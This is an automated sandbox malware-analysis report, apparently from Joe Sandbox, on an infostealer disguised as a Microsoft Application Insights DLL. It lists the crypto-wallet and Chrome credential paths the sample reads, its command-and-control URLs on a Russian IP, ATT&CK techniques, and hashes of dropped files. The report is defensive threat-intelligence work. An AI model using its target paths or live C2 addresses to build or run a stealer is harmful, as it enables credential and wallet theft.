Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: 00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API11	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection12	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery44	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	Security Software Discovery121	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion1	Proc Filesystem	Process Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Microsoft.ApplicationInsights.PersistenceChannel.exe	40%	Virustotal		Browse
Microsoft.ApplicationInsights.PersistenceChannel.exe	29%	ReversingLabs	ByteCode-MSIL.Packed.Generic

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\sqlite3.dll	0%	Virustotal	Browse
C:\ProgramData\sqlite3.dll	0%	Metadefender	Browse
C:\ProgramData\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.25.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.23.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.11.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.10.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://77.222.42.92/goodnews.php	0%	Virustotal		Browse
http://77.222.42.92/goodnews.php	0%	Avira URL Cloud	safe
http://77.222.42.92/public/sqlite3.dll	0%	Virustotal		Browse
http://77.222.42.92/public/sqlite3.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://77.222.42.92/goodnews.php	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.222.42.92/public/sqlite3.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://duckduckgo.com/chrome_newtab	XBAIMOPZ.2.dr	false	high
https://duckduckgo.com/ac/?q=	XBAIMOPZ.2.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	XBAIMOPZ.2.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	XBAIMOPZ.2.dr	false	high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	XBAIMOPZ.2.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://dc.services.visualstudio.com/v2/track	Microsoft.ApplicationInsights.PersistenceChannel.exe	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	XBAIMOPZ.2.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://dc.services.visualstudio.com/v2/trackY87C19923:	Microsoft.ApplicationInsights.PersistenceChannel.exe	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.679113220.0000000002E91000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	XBAIMOPZ.2.dr	false	high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	XBAIMOPZ.2.dr	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.222.42.92	unknown	Russian Federation		44112	SWEB-ASRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	482276
Start date:	13.09.2021
Start time:	15:54:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Microsoft.ApplicationInsights.PersistenceChannel.dll (renamed file extension from dll to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.spyw.evad.winEXE@9/9@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.4% (good quality ratio 4%) Quality average: 79.5% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 70 Number of non-executed functions: 30
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.211.6.115, 104.208.16.94, 20.82.209.183, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:55:32	API Interceptor	1x Sleep call for process: Microsoft.ApplicationInsights.PersistenceChannel.exe modified
15:55:55	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SWEB-ASRU	60rUtFJPFb.exe	Get hash	malicious	Browse	77.222.40.7
	niberius.dll	Get hash	malicious	Browse	77.222.42.67
	0708_3355614568218.doc	Get hash	malicious	Browse	77.222.42.67
	triage_dropped_file.dll	Get hash	malicious	Browse	77.222.42.67
	08.jpg.exe	Get hash	malicious	Browse	77.222.42.67
	0708_5355150121.xll	Get hash	malicious	Browse	77.222.42.67
	triage_dropped_file.dll	Get hash	malicious	Browse	77.222.42.67
	nimb.dll	Get hash	malicious	Browse	77.222.42.67
	0706_1050501748839.doc	Get hash	malicious	Browse	77.222.42.67
	file.dll	Get hash	malicious	Browse	77.222.42.67
	file.doc	Get hash	malicious	Browse	77.222.42.67
	file.doc	Get hash	malicious	Browse	77.222.42.67
	file.dll	Get hash	malicious	Browse	77.222.42.67
	file.doc	Get hash	malicious	Browse	77.222.42.67
	jax.k.dll	Get hash	malicious	Browse	77.222.52.246
	0526_28522894410229.doc	Get hash	malicious	Browse	77.222.52.246
	0526_1488782409783.doc	Get hash	malicious	Browse	77.222.52.246
	0526_17568640710485.doc	Get hash	malicious	Browse	77.222.52.246
	0526_4618771472215.doc	Get hash	malicious	Browse	77.222.52.246
	0526_1488782409783.doc	Get hash	malicious	Browse	77.222.52.246

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\sqlite3.dll	udG4T5U4kw.exe	Get hash	malicious	Browse
	WokOkognUw.exe	Get hash	malicious	Browse
	X6X2S4kxwQ.exe	Get hash	malicious	Browse
	qRtrAMES4f.exe	Get hash	malicious	Browse
	Xf74ZwnlqG.exe	Get hash	malicious	Browse
	7VL1FdrppM.exe	Get hash	malicious	Browse
	tuIqmXpga8.exe	Get hash	malicious	Browse
	7GU1k5rzf0.exe	Get hash	malicious	Browse
	IatYsx7ZOR.exe	Get hash	malicious	Browse
	9Q4LJz7clJ.exe	Get hash	malicious	Browse
	Purchase order.exe	Get hash	malicious	Browse
	PaymentAdvice.exe	Get hash	malicious	Browse
	XB0SQoadK4.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-genTrj.14465.exe	Get hash	malicious	Browse
	DcyCBedo25.exe	Get hash	malicious	Browse
	F2kvZ2vpfP.exe	Get hash	malicious	Browse
	37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exe	Get hash	malicious	Browse
	Payment_Advice.exe	Get hash	malicious	Browse
	fe0q9B7M7t.exe	Get hash	malicious	Browse
	0290FD4F9C7240911D9051F76167A75DD78834E6A03FA.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3AVJH2FWN4NV3EHF_2ef946da1f6452dd7dfcc2fa85c468c6437b1f_4630c9cb_145b58bf\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	14574
Entropy (8bit):	3.7684172249186663
Encrypted:	false
SSDEEP:	192:TRswJdrHBUZMXSaKOgMWS6/u7sNS274ItL6x:VlxBUZMXSaR6/u7sNX4ItLY
MD5:	CA680E3205A413318F5888EFBC365AEE
SHA1:	9B9C4513DD253CF0A7EFA31165447B2243EAFBD1
SHA-256:	5DE85C40BD46798A7F9DB1333080740EA5E9E2CE5FB1F3092EA09943D6D4CBB3
SHA-512:	139CFD922AA0BBB38CD335CF5B02E738F4FD73F0A9244462018E82B8F895F3CE4B8E5F8B8CF752F4DD1693884C7FFC8C32729F9F730E8B43E2329CB7FC38662C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.0.1.4.9.4.6.3.1.7.6.2.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.0.1.4.9.5.4.1.1.4.5.4.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.5.9.5.a.4.3.-.5.c.b.d.-.4.e.1.f.-.9.4.8.0.-.5.e.0.d.6.7.2.b.5.c.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.c.8.b.b.6.7.-.6.4.f.2.-.4.d.1.3.-.b.1.a.1.-.e.4.b.e.e.4.4.e.8.4.1.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.i.c.r.o.s.o.f.t...A.p.p.l.i.c.a.t.i.o.n.I.n.s.i.g.h.t.s...P.e.r.s.i.s.t.e.n.c.e.C.h.a.n.n.e.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...A.p.p.l.i.c.a.t.i.o.n.I.n.s.i.g.h.t.s...P.e.r.s.i.s.t.e.n.c.e.C.h.a.n.n.e.l...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.0.-.0.0.0.1.-.0.0.1.b.-.a.d.f.7.-.7.a.0.2.a.7.a.8.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.f.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFBB.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Sep 13 13:55:48 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	261145
Entropy (8bit):	4.464836824461755
Encrypted:	false
SSDEEP:	3072:9RD6Bo106jd+p+W0H+pYUCgUhoU9gIOgF5WbmYMaPcPsPcPfIl:qBY03p+WmTTjhh9RpDATcPsPcPs
MD5:	32E344E2BCBC92BEACC81C43319162F4
SHA1:	8F796EB6BF2EC4AB1755492F34F6749F768FB3EB
SHA-256:	E43C14BA87ABF3E58A92817493A3D536760548FEB052D4E550484BFC925C3AB7
SHA-512:	51CA3A2F596A75C21FFE632B14B48AC9D7A39BD34BBC5C36B56B7A92F4D9041CBF0351B30762DE075E0847B34BF8BB5FB311D0F95EEDF05C7F1C54F133C0E19C
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......dX?a...................U...........B......$"......GenuineIntelW...........T...........PX?a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCDC.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8522
Entropy (8bit):	3.7093720804268924
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6363s6YrhSUNP8XgmfZdSW+prY89bf4sfvVm:RrlsNiC6c6YtSUNP8XgmfDSvfrfg
MD5:	B3482E097EF750D898B065BCD1E4CB62
SHA1:	15951AB73377B8A3F04AF2809FB73AC77D639672
SHA-256:	C3D827083C0C276A20CE9559838906A5ED8BEBF194500E1BFE56EE61B76120F5
SHA-512:	3E1222A851FD45297D085A6DFF80726C8884E35BEC308134BEACAF8622017CA4C99D6C24FF28221E8851131E0A14F1F97BCDCD97B432FD911FF5DBA01D4DAD0F
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFFA.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4943
Entropy (8bit):	4.5792997437070975
Encrypted:	false
SSDEEP:	48:cvIwSD8zs/JgtWI9YuWSC8BC8fm8M4JAh/ea01F1+q8vZea07I+5uhn1hn7hgd:uITfhjPSNtJAkBKcfI+5uh1h7Od
MD5:	725E80DBA2CF1502948C72E2F676A5D8
SHA1:	3653934FBF2D3215AC8C0C67FC0A4B3659D9144D
SHA-256:	2527A5AC5B65323225B19938E8FB893493A696303F3F1EC28D4A13398301A918
SHA-512:	964DDD6A502905320B247838B09E515A84ABCD7071195EB819E8E51875808E4C273AAFB2475042B838BAFE2E9D4D248C957FAAB65A6237269EAF1231E81836FA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1164906" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: udG4T5U4kw.exe, Detection: malicious, Browse Filename: WokOkognUw.exe, Detection: malicious, Browse Filename: X6X2S4kxwQ.exe, Detection: malicious, Browse Filename: qRtrAMES4f.exe, Detection: malicious, Browse Filename: Xf74ZwnlqG.exe, Detection: malicious, Browse Filename: 7VL1FdrppM.exe, Detection: malicious, Browse Filename: tuIqmXpga8.exe, Detection: malicious, Browse Filename: 7GU1k5rzf0.exe, Detection: malicious, Browse Filename: IatYsx7ZOR.exe, Detection: malicious, Browse Filename: 9Q4LJz7clJ.exe, Detection: malicious, Browse Filename: Purchase order.exe, Detection: malicious, Browse Filename: PaymentAdvice.exe, Detection: malicious, Browse Filename: XB0SQoadK4.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-genTrj.14465.exe, Detection: malicious, Browse Filename: DcyCBedo25.exe, Detection: malicious, Browse Filename: F2kvZ2vpfP.exe, Detection: malicious, Browse Filename: 37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exe, Detection: malicious, Browse Filename: Payment_Advice.exe, Detection: malicious, Browse Filename: fe0q9B7M7t.exe, Detection: malicious, Browse Filename: 0290FD4F9C7240911D9051F76167A75DD78834E6A03FA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll Download File
Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
